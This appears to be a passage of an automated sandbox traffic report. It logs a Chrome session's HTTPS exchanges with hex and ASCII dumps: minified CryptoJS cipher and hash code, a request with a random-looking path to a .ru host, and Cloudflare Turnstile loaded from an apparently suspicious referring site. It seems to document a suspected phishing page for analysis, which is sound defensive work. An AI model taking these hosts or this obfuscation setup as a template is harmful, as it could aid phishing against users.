                                                          2024-08-27 22:10:38 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30
                                                          Data Ascii: ==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0
                                                          2024-08-27 22:10:38 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33
                                                          Data Ascii: for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3
                                                          2024-08-27 22:10:38 UTC1369INData Raw: 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36
                                                          Data Ascii: 1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16
                                                          2024-08-27 22:10:38 UTC1369INData Raw: 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69
                                                          Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                                          2024-08-27 22:10:38 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                                          Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                                          2024-08-27 22:10:38 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                                          Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                                          2024-08-27 22:10:38 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
                                                          Data Ascii: [39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449753188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:39 UTC425OUTGET /yujumitzgvwdmelzinmewQxtLOYJNEVXSSDHIHSVCETCIEVPNERHTXNUMDDPXUKLBBLLJCZAYXXBKOEQPMAUCC HTTP/1.1
                                                          Host: wox.dultzman.ru
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:39 UTC608INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4J3fBB0lF4IpZLqxjIUTWjautSDDEIH6okCXquP%2BJi0Gl6un65pRQX4DzHHgIneeQQg0gJSZJ3H%2FgSW4zxfO0G%2By267OlvMJO6A9izAL2sz%2BbxDcytLxGguzcSNMHjMVPtY%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f64924abb1819-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:39 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                          Data Ascii: 10
                                                          2024-08-27 22:10:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.449754104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:39 UTC558OUTGET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:39 UTC471INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:39 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 45035
                                                          Connection: close
                                                          accept-ranges: bytes
                                                          last-modified: Thu, 15 Aug 2024 16:28:23 GMT
                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                          access-control-allow-origin: *
                                                          cross-origin-resource-policy: cross-origin
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f64932e07c47a-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:39 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 67 29 2c 70 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 61 28 66 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                          Data Ascii: "use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);funct
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                          Data Ascii: e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function $e(e,r){return r=r!=nu
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 4a 65 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 43 74 28 65 29 7c 7c 4e 74 28 65 2c 72 29 7c 7c 4c 74 28 65 2c 72 29 7c 7c 6b 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                          Data Ascii: ray$/.test(a))return Je(e,r)}}function be(e,r){return Ct(e)||Nt(e,r)||Lt(e,r)||kt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ne(e,r){var a={label:0,sent:function(){if(u[0
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 46 74 3d 33 30 30 30 32 30 3b 76 61 72 20 6b 65 3d 33 30 30 30 33 30 3b 76 61 72 20 4c 65 3d 33 30 30 30 33 31 3b 76 61 72 20 42 3b 28 66 75
                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ft=300020;var ke=300030;var Le=300031;var B;(fu
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 75 65 7c 7c 28 75 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6c 65 3b 28 66 75 6e
                                                          Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ue||(ue={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var le;(fun
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 66 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                                                          Data Ascii: var Y="0/0";function ft(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 63 2c 75 3d 4c 28 78 72 2c 28 63 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 67 2c 5f 3d 4c 28 77 72 2c 28 67 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 67 21 3d 3d 76 6f 69 64 20 30 3f 67 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 26 26 75 3f 22
                                                          Data Ascii: HAVING_TROUBLES,c,u=L(xr,(c=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&c!==void 0?c:"nonexistent"),g,_=L(wr,(g=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&g!==void 0?g:"nonexistent");return o&&u?"
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                                                          Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                                                          Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
